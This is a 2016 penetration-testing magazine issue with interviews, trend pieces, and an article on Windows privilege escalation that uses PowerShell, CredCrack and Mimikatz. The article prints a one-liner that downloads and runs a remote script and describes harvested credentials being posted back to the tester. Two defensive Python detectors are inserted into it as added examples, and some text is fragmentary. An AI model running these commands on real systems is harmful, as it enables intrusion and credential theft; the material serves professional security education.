PenTest OPEN. Trends in 2016
TRENDS IN 2016
Whilst every effort has been made to ensure the high quality of
the magazine, the editors make no warranty, express or implied,
concerning the results of content usage. All trade marks presented
in the magazine were used only for informative purposes.
All rights to trade marks presented in the magazine are reserved
by the companies which own them.
DISCLAIMER!
The techniques described in our articles may only be used in
private, local networks. The editors hold no responsibility for
misuse of the presented techniques or consequent data loss.
Contents
"I think it is a great space to be in right now and for the future" - interview with Kai Pfiester, founder of Black Cipher Security
10
13
20
24
27 - by Martin Brough
29
32 - by Tom Updegrove
36
KAI PFIESTER
[PT]: As a person who knows penetration testing tools a lot, do you think there are going to be any
breakthrough changes in technology?
[KP]: Absolutely! I think it is only a matter of time before quantum computers will be able to crack RSA
encryption pretty quickly. Multi-factor authentication based on physical and / or behavioral traits seems to
be the best approach to truly securing things. For instance, the banking industry is seriously considering
using a person's heartbeat to authenticate before granting access to certain financial services.
[PT]: There seems to be a very strong push to get rid of passwords and replace them with more reliable
solutions. What do you think about that? Is that a move in the right direction?
[KP]: I completely agree that we need to get rid of passwords once and for all as a form of single-factor
authentication. They can stick around if we use them only in multi-factor authentication scenarios. VCRs
and video tapes were great when they first came out. They served their purpose well. But then came DVDs
and now we are streaming video directly to our screens. Passwords are in the same boat. With super-powerful
GPU-based password cracking machines, freely available wordlists, rainbow tables, etc., many
common passwords can be cracked within a week to ten days. If passwords are accompanied by some
form of two-factor authentication, the account they are protecting is pretty safe. But I imagine it
is only a matter of time before that obstacle is overcome.
[PT]: Can you tell us what is changing in terms of recruiting pen testers or cyber security specialists?
Do you find it's going to be harder to find a job in this area?
[KP]: I recently discovered a website called stealthworker.com that specializes in recruiting and staffing for
cyber security. I imagine that there will be other sites like it and eventually there will be a clearing house, so
to speak, where you can find the talent that you are looking for. As for finding a job in this area, no, I don't
think it is going to be harder. You cannot go wrong by specializing in IT. You can almost always find a job. As
for the cyber security market, if you have the skills, there will always be work. Especially in the government
sector.
[PT]: Every day we can hear about new attacks. How do you see cyber threats evolving in the near
future?
[KP]: As cyber security product vendors make products better at detecting the subtlest attacks, attackers
will be forced to evolve their attacks as well as their skillset. The human factor is always going to play a part
since humans are the ones that can make the greatest security technology in the world completely useless
by not configuring it correctly or by being social-engineered to turn it off. Leveraging PowerShell in Windows
is also a growing attack vector as it does not trip AV. So I imagine using a system's tools against itself will
also play a part in the types of attacks we see a lot of in the future.
[PT]: Following the previous question, do you find the tools we have are good enough to ensure complete
protection of a company?
[KP]: The primary weaknesses in cyber security are threefold: humans, technology and processes. There is
great security awareness training available for people so that is covered. There are also highly effective data
security technologies as well as policies that govern how IT equipment and data should
be handled. So what, then, is the problem? The problem is that rarely are all three of these factors
implemented together into a solid cyber security defense strategy. When they are, a data breach is
an extremely rare occurrence, if it ever is.
[PT]: Have you got any final thoughts about trends in penetration testing and vulnerability analysis in
2016?
[KP]: As more and more people get into the field we are going to see some really cool tools
be developed. I also think we are going to see more frameworks like SET and Metasploit be released.
When parents have only one child, that child has no one to learn from. Most of his or her knowledge comes
from single-handed experience. But the next child born into the family not only learns from their own
experience, but learns from the other child as well. So the second child's skillset develops faster than the
first child's skillset. We have the same situation with pen testing and vulnerability analysis
as well. These fields are young and the elders have set the stage with all their hard work and contributions.
But I think the younger generation is going to improve and build upon the current foundation and develop
tools that will be super effective in bypassing today's defense technologies.
[PT]: Do you have any thoughts or experiences you would like to share with our audience? Any good
advice?
[KP]: Never be so arrogant that you think you are unhackable or not worth an attacker's time
or attention. I once had a business lead at a certain company and after talking to the company's IT guy, he
basically told me that he had all the company's cyber security under control. At that point, I said OK and let
it be. Six weeks later I get a call from him. He was in panic mode because his network had been hacked.
They noticed more bandwidth than normal was being eaten up and tracked it to a specific server. Upon
further investigation it had been hacked and was turned into a spam server. After checking the timestamps
on certain files, it was determined that his network was hacked prior to, and during, the time he told me that
he had all the network's security under control and didn't need my help. True security requires humility and
constant vigilance.
One of the predictions for 2016 is that it will be a year of Hacking the Code. Not the
DaVinci Code, computer code. This code contains vulnerabilities and it is being
exploited through underlying integrations and connections to various enterprise-class systems.
The second prediction is that we will see cybersecurity and incident
response automation. This relates to the notoriously error-prone nature of human
beings who, despite genuine talent, create the automation and digital world we
know today.
Penetration testing is, by many, already considered to be a commodity tactic today.
To achieve the best results, a pentester needs to combine various strategies: leveraging the power
of top-notch automated tools, mixing manual and automated testing, writing their own tools
for new technologies, a solid knowledge of the systems attacked, scripting, social
engineering, dark web spider-intelligence, and more. Many popular penetration testing tools help
penetration testers create fancy-looking reports that leave a great impression (and resonate well)
with the client. Tools then combine online dark web data, perimeters, systems, and application layers
in one beautiful report with its own scoring schema. Oftentimes, the driving force
of penetration testing is a need to be in compliance with regulations instead of a genuine decision to
actually improve security.
The benefits of using automated tools are great and it is always a good idea to be equipped with the
best tools available that can help automate the work as much as possible. You could almost think of
it as a scripted set of testing attacks with payload parameters. This is where we see the industry going.
They do not have to be commercial. A great momentum exists in the open source community, including
OWASP. Of course, even with more automation, there will still be a major difference in the quality of
work between top penetration testers and an automated scan - a vulnerability scan does not equal
a pentest. The shift towards automation, however, can be a cost-efficient alternative for companies
looking to save on basic penetration testing services and a good way for any penetration testers
looking to save time and be more efficient.
One peculiar nightmare of automated tools is the ratio of false positives, followed by the ranking and
interpretation of findings. Humans are still needed to properly categorize and eliminate false
positives. The learning capabilities that tools provide are still far away from what the popular terms
machine learning and intelligence suggest, however.
Mobile devices - iOS, Android, or Windows based native applications, as well as hybrid
application assessments, will become more and more important as the use of mobile devices
gradually shifts from entertainment to business use and processing financial and other sensitive data.
To assess the security of such applications there will be a need to combine classic crawling and scanning
with a web browser engine, JavaScript debugger, forward/backward tracer, unpacking/de-obfuscation
snapshot comparer, script-based state/variable alerting, injecting and fuzzing.
Wireless systems - Software-defined radio (SDR) based wireless security assessments, WiFi,
smart meters, wearable devices, etc. - all this will require specific tools and skillsets.
Machine learning
counter-measures.
Internal network pentesting - will be used more as companies realize that penetrating
their internal networks using social engineering is a real possibility.
Social engineering
a possibility that an automated robot can get to a company building and ask somebody to "print his
resume" from a USB drive.
Legacy systems - remnants of an older era, with a plethora of well-humming and rather
dated production deployments out there, are great examples of where pentesters are needed. These systems will
continue to require pentesting, which will not deviate greatly from currently proven methodologies, and
a skilled pentester is crucial for those precise military sniper missions.
We do believe that in the near future and beyond (at least until the time when applications are fully
developed and auto-improved by autonomous artificially intelligent agents), it will still be the human
genius and intelligence, in-depth understanding, and efficient utilization of automated tools, which will
determine the most successful pentesting outcomes. Terminator is an interesting concept and a movie;
only time will show how far artificial intelligence will get and whether human genius will replace itself with
fully automated systems. Do not forget that, in the present day, it is the human hacking skillset that has so far
won the race against machines.
JARO NEMCOK
Web Security Researcher at LIFARS LLC, an international cyber security and
digital forensics firm. He started his career in software development with
focus on security and later moved to Information Security, focusing
on system audits, security/risk assessments, penetration testing, incident
response to hacked web applications, and overall security.
He has almost two decades of cybersecurity experience, including
vulnerability assessment, secure code review, cloud-based penetration
testing, digital risk assessment, digital evidence acquisition, investigation
of web attacks, security assessments of Internet-facing applications,
penetration tests across internal networks, development of testing scripts
and procedures, and digital forensics. Jaro worked on many high-profile
cases, including a much publicized Box.com and Dropbox leakage.
ONDREJ KREHEL
CEO and Founder of LIFARS LLC, an international cybersecurity and digital
forensics firm. With over two decades of experience in computer security and
forensics, he conducted a wide range of investigations, including data
breaches through computer intrusions, theft of intellectual property, massive
deletions, defragmentation, file carving, anti-money laundering, financial
fraud, mathematical modeling and computer hacking.
Ondrej's experience also includes advanced network penetration testing,
database security testing, physical security assessments, logical security
audits, wireless network penetration testing, and providing recommendations
for operational efficiency of approaches. He is one of the few security experts
in the world holding the Certified Ethical Hacker Instructor Certification (CEI).
Ondrej worked on many high-profile cases, including a much publicized
Privilege escalation is a task that proves difficult at times. In the past, one would
rely heavily on Metasploit as the full exploitation suite. With Metasploit, one
would not only be able to exploit a vulnerability but quickly elevate privileges
with the getsystem command. However, with the landscape of cybersecurity
constantly changing, it was only a matter of time before network administrators
implemented new technological advancements that would detect and prevent
most Metasploit payloads. With one of pentesters' favorite tools now being
detected, pentesters needed to find an alternative solution.
Welcome to the new era of pentesting, an era where dropping binaries onto victim systems is no longer
required. An era where one can execute shellcode or obtain credentials in the clear without touching
the file system. Welcome to the era of pentesting with PowerShell.
This article aims to provide a technical introduction on how to use PowerShell to quickly escalate
privileges on Windows operating systems.
There is an error when the script is run locally since PowerShell's execution policy is set to Restricted.
This means that no PowerShell scripts can be run.
Figure 1: PowerShell execution error
However, if the script is uploaded to a web server and DownloadString is used, PowerShell's execution
policy is bypassed.
Table 2: Example of PowerShell's DownloadString functionality
PS > IEX (New-Object Net.WebClient).DownloadString('http://gojhonny.com/pentestmag/ipconfig.ps1')
Armed with this knowledge, pentesters started creating PowerShell scripts and combining them with
the DownloadString method to bypass security restrictions. Today, two of the most widely used scripts
are the Invoke-Shellcode and Invoke-Mimikatz scripts. Both scripts may be found on
Matt Graeber's GitHub (https://github.com/mattifestation).
After executing the script on the victim system, one should have obtained a shell as shown in Figure 3.
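The defender's view of the DownloadString cradle above, as an added example that is not part of the article or of the scripts it names: a small Python detector that scans PowerShell script block log entries (modelled on Event ID 4104 and flattened to an assumed host|user|scriptblock line format, with constructed sample data) for content fetched from the network and passed straight to IEX. Because the execution policy never sees a string handed to Invoke-Expression, the detection keys on the fetch-and-execute pattern rather than on policy changes.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample of PowerShell script block log entries (modelled on
# Event ID 4104, flattened to "host|user|scriptblock" for this example).
# The second line mirrors the one-liner shown in Table 2 of the article;
# the other lines are made up for this example.
SAMPLE_4104 = """\
WS01|acme\\bob|Get-ChildItem C:\\Users\\bob\\Documents
WS01|acme\\bob|IEX (New-Object Net.WebClient).DownloadString('http://gojhonny.com/pentestmag/ipconfig.ps1')
WS02|acme\\alice|Invoke-Expression (New-Object System.Net.WebClient).DownloadString("http://example.invalid/a.ps1")
WS03|acme\\carol|iex ((new-object net.webclient).downloadstring('http://example.invalid/b.ps1'))
WS04|acme\\dave|$wc = New-Object Net.WebClient; $wc.DownloadFile('http://example.invalid/t.zip', 'C:\\tmp\\t.zip')
WS05|acme\\erin|Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
"""

# IEX is an alias of Invoke-Expression; match either, case-insensitively.
EXEC_RE = re.compile(r"(?i)\b(iex|invoke-expression)\b")
# Network fetch methods of System.Net.WebClient used by download cradles.
FETCH_RE = re.compile(r"(?i)\.download(string|file)\s*\(")
URL_RE = re.compile(r"(?i)https?://[^\s'\")]+")


@dataclass
class Finding:
    host: str
    user: str
    url: str
    severity: str  # "high" = fetch and execute in memory, "medium" = fetch only


def classify_block(block: str) -> str | None:
    """Return a severity for one script block, or None if it looks benign."""
    fetch = FETCH_RE.search(block)
    if fetch is None:
        return None
    # Fetched text piped straight into Invoke-Expression never touches disk,
    # which is exactly why the execution policy does not stop it.
    if fetch.group(1).lower() == "string" and EXEC_RE.search(block):
        return "high"
    return "medium"


def detect_download_cradles(log_text: str) -> list[Finding]:
    """Scan flattened 4104-style lines and return one Finding per suspicious block."""
    findings: list[Finding] = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        host, user, block = raw.split("|", 2)
        severity = classify_block(block)
        if severity is None:
            continue
        url_match = URL_RE.search(block)
        findings.append(Finding(host, user, url_match.group(0) if url_match else "", severity))
    return findings


if __name__ == "__main__":
    for f in detect_download_cradles(SAMPLE_4104):
        print(f"{f.severity:6} {f.host} {f.user} -> {f.url or '(no url)'}")
```

Enabling script block logging is what makes this visible in the first place; the one-liner itself leaves no file on disk to scan.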
The ability to execute this script in memory is incredibly powerful for pentesters. Imagine recursively
obtaining the credentials of all systems in a domain. One would be able to obtain domain administrator
credentials in seconds and successfully escalate privileges. This is where CredCrack comes in.
AUTOMATING PRIVILEGE ESCALATION WITH CREDCRACK
Pentesters love automation, in fact we love automating as many things as possible. Thankfully, there
are tools that have been created to automate exploitation and privilege escalation and make the lives
of pentesters easier. With great tools, such as Empire, PowerUp and CredCrack, one may go from
domain user to domain administrator in seconds. The following section will demonstrate how to use
CredCrack, a popular credential harvesting script.
CredCrack was created and released by myself, Jonathan Broche, in August of 2015
(http://blog.gojohnny.com/201508/domain-administrator-in-17-seconds.html). Since then, it has become a popular tool amongst pentesters and
with the online community. CredCrack has two main functionalities: share enumeration and credential
harvesting.
Table 5: CredCrack's help menu

usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
                    [-l LHOST] [-t THREADS]

CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing IPs to harvest creds from. One IP per
                        line.
  -r RHOST, --rhost RHOST
                        Remote host IP to harvest creds from.
  -es, --enumshares     Examine share access on the remote IP(s)
  -l LHOST, --lhost LHOST
                        Local host IP to launch scans from.
  -t THREADS, --threads THREADS
                        Number of threads (default: 10)

Required:
  -d DOMAIN, --domain DOMAIN
                        Domain or Workstation
  -u USER, --user USER  Domain username

Examples:
  ./credcrack.py -d acme -u bob -f hosts -es
  ./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20
Once domain user credentials have been compromised, it is recommended to use CredCrack's share
enumeration functionality to identify systems the compromised user has administrative access to.
The share enumeration functionality uses the SMB protocol to test shares for write access on the
systems provided. Systems that grant read/write access to their administrative share (C$) indicate that
the user has local administrative access.
Figure 6: Enumerating share access with CredCrack
After using the share enumeration functionality, the pentester would create a list of systems with
administrative access and feed them into CredCrack's credential harvesting functionality.
Once Mimikatz has been executed on the victim system through PowerShell, it will send the credentials
in a POST request to the pentester's system.
Figure 8: Illustration of CredCrack sending credentials in a POST request back to the pentester
After all victims have finished the execution of Mimikatz, CredCrack will search for any matches against
the domain administrator list to see if a domain administrator account was obtained and, if so, output
the account's credentials.
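A defender-side companion to the share enumeration and harvesting steps described above, added here as an example and not part of CredCrack or the article: it reads Windows share-access events (modelled on Event ID 5140 and flattened to an assumed time|account|source_ip|target_host|share_name format, with constructed sample data) and flags one account reaching the C$ or ADMIN$ share on many distinct hosts within a short window, which is the footprint the share enumeration step leaves on the targets.

```python
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample modelled on "A network share object was accessed"
# (Event ID 5140) records, flattened to one line each:
#   time|account|source_ip|target_host|share_name
# The first six lines imitate a share enumeration sweep from one host; the
# rest are ordinary activity. All values are made up for this example.
SAMPLE_5140 = """\
2016-01-12T09:00:01|ACME\\bob|192.168.1.102|FS01|\\\\*\\C$
2016-01-12T09:00:02|ACME\\bob|192.168.1.102|WS07|\\\\*\\C$
2016-01-12T09:00:02|ACME\\bob|192.168.1.102|WS12|\\\\*\\C$
2016-01-12T09:00:03|ACME\\bob|192.168.1.102|SQL02|\\\\*\\C$
2016-01-12T09:00:04|ACME\\bob|192.168.1.102|DC01|\\\\*\\C$
2016-01-12T09:00:05|ACME\\bob|192.168.1.102|WS31|\\\\*\\C$
2016-01-12T09:05:00|ACME\\alice|192.168.1.55|FS01|\\\\*\\Projects
2016-01-12T09:06:00|ACME\\alice|192.168.1.55|FS02|\\\\*\\Projects
2016-01-12T13:30:00|ACME\\svc_backup|192.168.1.9|FS01|\\\\*\\C$
2016-01-12T13:45:00|ACME\\svc_backup|192.168.1.9|FS02|\\\\*\\C$
"""

# Administrative shares whose write access implies local admin on the target.
ADMIN_SHARES = {"C$", "ADMIN$"}


@dataclass
class ShareEvent:
    when: datetime
    account: str
    source_ip: str
    target: str
    share: str  # bare share name, upper-cased, e.g. "C$"


def parse_5140(text: str) -> list[ShareEvent]:
    """Parse the flattened sample format into ShareEvent records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, account, src, target, share = line.split("|")
        bare = share.rsplit("\\", 1)[-1].upper()  # "\\*\C$" -> "C$"
        events.append(ShareEvent(datetime.fromisoformat(ts), account, src, target, bare))
    return events


def detect_admin_share_fanout(events, min_hosts: int = 5, window_seconds: int = 60) -> list[dict]:
    """Alert when one account from one source reaches admin shares on at least
    min_hosts distinct targets inside a sliding window of window_seconds."""
    window = timedelta(seconds=window_seconds)
    by_actor: dict[tuple[str, str], list[ShareEvent]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.when):
        if ev.share in ADMIN_SHARES:
            by_actor[(ev.account, ev.source_ip)].append(ev)

    alerts = []
    for (account, src), evs in by_actor.items():
        start = 0
        for end, cur in enumerate(evs):
            # Slide the window start forward until the span fits inside `window`.
            while cur.when - evs[start].when > window:
                start += 1
            hosts = {e.target for e in evs[start:end + 1]}
            if len(hosts) >= min_hosts:
                alerts.append({
                    "account": account,
                    "source_ip": src,
                    "first_seen": evs[start].when.isoformat(),
                    "hosts": sorted(hosts),
                })
                break  # one alert per actor is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect_admin_share_fanout(parse_5140(SAMPLE_5140)):
        print(alert)
```

Tune min_hosts and window_seconds against your own baseline: backup and patch-management accounts legitimately touch C$ on many hosts, but rarely dozens within a few seconds from a workstation.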
Domain administrator in just 10.9 seconds! CredCrack has proven to be one of the fastest ways to
escalate privileges in large enterprise environments and is just one example of the several powerful
tools available for pentesters today.
CONCLUSION
There are several ways to escalate privileges on a network and the aforementioned tools are just
a handful of them. The cyber security landscape is always changing and there is always something to
be learned. Try the methodologies mentioned in upcoming pentests and do not be discouraged from
researching new methodologies and building the next best tool!
About the author:
JONATHAN H. BROCHE
A computer security professional with over ten years of hands-on experience in the
Information Technology field. He specializes in penetration testing, social
engineering and system security configurations. Jonathan has a bachelor's degree
in Information Technology from Florida International University with concentrations
in application development and UNIX administration. Additionally, he has earned
certifications from Offensive Security (OSCE, OSCP, OSWP) and the Global
Information Assurance Council (GSEC).
Jonathan is also a researcher, writer and speaker. His latest contribution to the
industry is the renowned CredCrack tool which gained international attention upon
its release. Jonathan is an active member of several security-related organizations
such as local ISSA and OWASP chapters and frequently participates in capture
the flag events. In his free time he enjoys mountain biking.
INTRODUCTION
In January of 2011, the United States Government Accountability Office (GAO) reported to Congress that
"Utilities are focusing on regulatory compliance instead of comprehensive security" and that "security
requirements are inherently incomplete, and having a culture that views the security problem as being
solved once those requirements are met will leave an organization vulnerable to cyber-attack." It is not
only utilities that suffer from this problem; in the last 18 months, over 150 million credit card numbers
and protected health records have been stolen from companies that had all been found compliant
in their most recent assessments. Companies like Target, JP Morgan, Home Depot, and Neiman Marcus
(to name only a few) have learned just how short of true security a compliant program can leave you.
In regulated industries, it has become common practice for management to assume that compliance and
security are one and the same. They believe that because an auditor has marked them as being
compliant, there are no further actions that need to be taken to secure their systems. The idea that
because something is compliant, it must also be secure has become an inside joke among security
professionals; unfortunately, those same professionals are often incapable of translating to management
exactly why a compliant system is not necessarily secure.
"However, it is also important for the penetration tester to be aware of and knowledgeable about the regulations with which their client must comply."
It is no secret that many companies value third party input much
more highly than they do internal recommendations. A request
that has been made multiple times by a security team may
suddenly be fulfilled if it comes as a recommendation in a third
party report. As such, it is often the responsibility of the
penetration tester to identify the areas where management has
been lax in assigning resources and prioritize their
recommendations accordingly. If it is clear that large amounts of
the security budget are being directed towards a brand new Security Incident and Event Manager (SIEM),
but the security staff doesn't have the knowledge or training to support that SIEM, it is important for the
penetration tester to recognize this and recommend training for the security staff.
Writing a report that recommends changes that fall far outside the scope of the client's compliance
needs is as likely to create meaningful change as not writing the report at all. On the other hand, if the
report can be aligned with the client's compliance goals, it becomes far more likely that management
and the security team will utilize it to achieve not only greater security, but also stronger compliance.
become apparent once the organization actually looks more deeply at the nature of the testing, how
it was initiated and performed.
It is important to regularly ask questions of the SI such as how deep was the testing and how was the
scope validated? When you look at the small print of what was actually agreed, you may find the level
of testing agreed to was actually only superficial and mostly automated scanning, hardly real
penetration testing at all. This may be far below the actual capability of the SI, and maybe they did not
engage their top-tier testers or allow as much time as required to do a truly effective job at identifying the
more subtle issues. Unless the organization employs specialists who examine or validate the level
of testing, there may be an assumption that everything is fine as penetration testing is completed
regularly.
Scope is another important factor. The SI will typically be very good at keeping a complete and up
to date list of all the assets being managed, as that is effectively their only way of accurately calculating
the service costs, so it is in their interests to manage that list well. What the asset list does not do,
however, is keep a true track of what should be part of annual testing. From a PCI perspective, maybe
it is effective as long as the organization has kept the SI informed of which applications or data sets
may be considered as within a PCI scope. This is not always something that is as black and white as
it should be, for not all organizations have cleanly defined network scopes or security zones. For those
organizations where a PCI scope may bleed into other networks due to applications being connected to
the PCI zones, unless the SI and the organization are both synchronizing their view of PCI scope, things
may be lost in translation. This can leave some potentially valuable PCI targets out of scope for the
annual testing.
Regulatory requirements are also evolving and generally this tends towards stricter security controls
which can result in additional complexity. Introducing a requirement to perform authenticated testing, for
example in PCI v3, creates a need to perform Penetration Testing in a very different way on some
systems. For applications that require authentication, it can be very difficult to obtain credentials for the
SI Penetration Testers, or there may be other complexities due to conflicting regulatory requirements
around who can get access or how the access must be provided. If this is a new requirement for which
the organization has never previously had to deal with, especially outside of its pre-production testing
networks, sometimes a new end-to-end facility to permit authenticated testing must be created. All of this
will take time. The contract between the organization and the SI may simply not accommodate this at all,
but the time to find this out is not a few weeks before the regulatory audit is due!
When outsourcing such things as Penetration Testing to an SI, there is often an implicit level of trust and
the service is not generally questioned. Service reporting is often all green, indicating all deliverables are
on track; after all, that's what you pay an SI for: to deliver the contracted service on time. You don't
generally get an independent attestation as to quality, or careful validation that it is meeting the real
security requirements of the organization. Few SIs pro-actively deliver this kind of service and it is
incredibly important for the organization to either employ people with the necessary skills to validate the
quality and scope of penetration testing, or to regularly dip-test by using an independent Penetration
Testing organization who can provide a baseline to identify service gaps.
If you are to avoid the pitfalls caused by implicit trust in the services delivered by an SI, and to maximize
the actual deliverables, then the governance over the scope and quality of testing should never
be outsourced directly to the SI. That and the growing pressures of regulatory compliance, especially
PCI, may mean it's time to renegotiate the contract with the SI and to seek a regular independent view
to ensure they stay on track.
About the author:
JIM HART
A seasoned Security Professional who has developed and honed his skills
over the past 15 years in security. A consummate specialist who has
successfully transformed from a highly skilled technical engineer, to Manager
of a team of security analysts (UK and matrix-managed those in India),
through consulting and then transitioning into a business development role
delivering thought-leadership for major clients' information security
requirements within an Enterprise sales team of a Fortune500 security
software and service provider.
Pentesting
a true art form
by Martin Brough
Pentesting is truly an art form that I have studied for most of my life; however,
pentesting is a dying art form that needs to be resuscitated! I don't mean that
people are no longer using pentests; in fact, it's just the opposite.
I have noticed that over the past five years, annual pentesting is working its way from being thought
of as something you just do to meet (enter acronym here) compliance to standard IT security practice.
Within the past two years, I have noticed a significant increase in companies adding annual pentests
into their contracts with companies that handle their data. Companies that offer services such as SaaS,
cloud data storage, outsourced web development and media management are now all being required
by contract to participate in both annual audits of their systems and penetration tests to ensure their
data is secure. So what do I mean by "Pentesting is a dying art form"? I mean that pentesting is
a highly skilled practice and should be conducted by professionals who have been trained and know
what they are looking for and how to test your company's systems. It seems that every script-kiddie
with a Kali box these days will tell you they are a pentester!
I think it's really important to convey a few key points about penetration tests:
1. A pentest does not make your company un-hackable. The main objective of a well-done pentest is to
reduce your attack surface. Your goal as a company should be to allow the specialized team conducting
the pentest to treat your network as though they were a real attacker trying to get in. You want to find as
many holes in your network as you can and close them.
2. Put as few restrictions on the pentesters as possible. A recent trend I have noticed in the past year has
been companies that are contractually obligated to have these tests done but see them as a burden and
dramatically limit the network exposure that the teams are allowed to have. This makes the results of your
pentest borderline useless. One example I have seen of this is being told I can give them a report of my
web application scans but under no circumstances am I to exploit any vulnerability found. Exploitation not
only helps to find the directions of traversal after gaining access but also tests any scanners, firewalls and
loggers that are in place to see if they are configured to pick up on these kinds of events, so it is very
important to allow the pentesters to run a full pentest against your defenses.
3. After all is said and done, your pentest is complete, your attack surface reduced and you have your
certificate in hand, spend the next 364 days maintaining the hard work you just put in. Patch your systems,
check your logs, and always verify your code.
MARTIN VOELK
Martin is an IT Security veteran with 18 years of experience
in the IT industry. Prior to setting up CYBER 51 in 2009, Martin
was already regularly teaching Penetration Testing Training
Courses, Cisco authorized Security Courses and was regularly
engaged by governments and other businesses to establish
Security policies, perform Ethical Hacking and Penetration Tests
in order to secure network infrastructures and to remediate the
threats encountered.
[PM]: What is the major difficulty in working with such different companies and sectors?
[MV]: One big challenge is to find the right way of addressing uncovered vulnerabilities with the customer.
On some occasions, especially in larger companies, internal engineers become very defensive when being
confronted with results. However, it's not our aim to finger-point. We merely uncover holes and help
customers become more secure. On other occasions, the more we find, the more it is appreciated.
Another big challenge is governmental work as it often requires very specific skills and certifications but the
consultant holds a wrong passport. This can be very frustrating at times as, for example, only a UK citizen is
allowed to perform the work for a UK government client.
[PM]: From your own experience, do you prefer to work with smaller or bigger companies?
[MV]: We prefer mid-size to large-size.
[PM]: I can see your company provides great initiative: free educational sessions for children. Can you
tell us more about this idea?
[MV]: Those are little awareness workshops for children at schools. We started that program in Mexico
where one of our offices is. We teach children how to stay safe when using laptops, smartphones, pads,
social media, chat rooms, etc., and we also show parents how to employ filters for content not suitable for
kids.
[PM]: What are your general thoughts about development of cyber security market?
[MV]: The big areas we see (and where loads of attacks are directed to) are: Human user (Social
Engineering), Web Applications, Mobile Apps and Wireless.
[PM]: As a person who knows penetration testing tools a lot, do you think there are going to be any
breakthrough changes in technology?
[MV]: Cloud Services will change the tool landscape even more than it already has. Web Applications will
become more sophisticated and need more testing and the mobile market brings its own new challenges in
Wireless and Apps.
[PM]: Can you tell us what is changing in terms of recruiting pentesters or cyber security specialists?
Do you find it's going to be harder to find a job in this area?
[MV]: Our main markets are the US and strong emerging markets in Latin America (mainly Brazil, Chile,
Colombia and Panama). We also engage in the UK market but very little in other countries. For us the
biggest challenge is actually finding the right skill set for new hires. Unlike in Europe, companies and
employers in the US actually often struggle to find the right skills available.
The top 3 criteria:
- OSCP certified or better (OSCE etc.). The Offensive Security certifications are the best ones in the market
and we hire OSCPs over CEH, because the OSCP is a hands-on and very challenging exam. Someone
who passed that exam is a real pentester who also can do reporting.
- Good English skills to communicate with the customer and write reports. Sounds basic, but a lot of the
guys outside the US don't come with great English language skills.
- Integrity, working to timelines and reliability.
[PM]: Every day we can hear about new attacks. How do you see cyber threats evolving in the near
future?
[MV]: It will remain a never-ending cat and mouse game. The trends are shifting more to organized crime
and away from individual guys. Some of the attacks we have seen at customers require teams of highly
skilled experts and tools, and a lot of the underworld has created and is creating task forces for certain jobs.
A lot more challenging to tackle than the lone hacker or script kiddie.
[PM]: Have you got any final thoughts about trends in penetration testing and vulnerability analysis in
2016?
[MV]: We see a lot of the regulations which are standard in the Western world being adopted by Latin
American countries now as well. PCI 3.0 introduced a lot of changes which focus more on pentesting. Also,
a lot of companies start realizing that technical defense isn't everything and that social engineering makes
up a lot of the breaches. User education and enforcement of policies will become a much bigger part.
[PM]: Do you have any thoughts or experiences you would like to share with our audience? Any good
advice?
[MV]: Think of security as a wheel and a never-ending circle. A traditional pentest (Network and Web App) is
not good enough anymore these days. Pentesting should include mobile App, Wireless, Bluetooth and
Social Engineering. For aspiring pentesters and existing pentesters, do the Offensive Security Certified
Professional (OSCP) certification. It's very well recognized in the industry and weeds out the theory from the
hands-on folks.
I started to write this article about one of my favorite security tools, Cobalt
Strike, but as I delved into the history and thinking behind Cobalt Strike I
realized that a better story lies beneath the surface. The real story is about
Pentesting and Adversarial Role Playing, which is thought to be the next stage
of Digital Security. There's a whole new breed of White Hat Hackers, and
they are called Threat Actors.
ARMITAGE
On the Armitage home page it says: "Cyber Attack Management for Metasploit", but Armitage is more
than that. Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets,
recommends exploits, and exposes the advanced post-exploitation features in the framework.
My first introduction to Metasploit was via the CLI, which was important for understanding the framework.
How well one understands the Exploits, Payloads, Meterpreter, Auxiliary components and scripts
determines how well and how effective the attack is. Seeing the same commands and getting feedback
visually is so much more helpful. It is like listening to a TV show on the radio versus seeing it on a 4K flat
screen in surround sound. Well, maybe not that extreme, but you get the idea.
COBALT STRIKE
Cobalt Strike is like a grown-up version of Armitage. According to its website, Cobalt Strike is for
Adversary Simulation and Red Team Operations. Versions 1.0 & 2.0 utilized the Metasploit Framework
and were one of the first usable GUI frontends for Metasploit. An important component of Cobalt Strike
is Beacon. "Beacon is Cobalt Strike's payload to model advanced attackers. Use Beacon to egress
a network over HTTP, HTTPS, or DNS. You may also limit which hosts egress a network by controlling
peer-to-peer Beacons over Windows named pipes" (Cobalt Strike website). Another aspect of Cobalt
Strike is its social engineering features, which allow the Actor to get a foothold, covert command and
control with Beacon, browser pivoting, and reporting on top of Armitage's existing exploitation and team
collaboration capabilities. Using Beacon you can tunnel Meterpreter commands and utilize all of the
Metasploit exploit and post-exploit capabilities. Beacon facilitates the running of PowerShell scripts
over its connection, and Python or Java, for example. There is even an email phishing module that reports
when your recipients open the phishing email you sent them.
RED TEAMS
According to Wikipedia, "A red team is an independent group that challenges an organization
to improve its effectiveness. The United States intelligence community (military and civilian) has red
teams that explore alternative futures and write articles as if they were foreign world leaders." Little
formal doctrine or publications about Red Teaming in the military exist. [1]
[1] LtCol Brendan S. Mulvaney, "Strengthened Through the Challenge" (PDF), Marine Corps Gazette, July 2012.
- Long-term Operations
- War Games
As threat actors move deeper into the network, their movements and methods become difficult
to detect, especially when they utilize Windows features and tools typically used by IT administrators.
Gaining administrative privileges also makes threat actors' activities undetected or even untraceable.
REMEDIATION
In the past few years, there have been a number of great industry reports written and statistics shared
on data breaches and investigations. Many of them focus on investigative findings and detection
trends. There has been less focus, however, on what is arguably the most transformative component
of an adversarial engagement: the successful remediation and the maturation of an organization's
ability to detect and respond to attacks moving forward. How do attackers respond to remediation
actions, and what distinguishes successful organizations from those that were less successful?
A few points to consider:
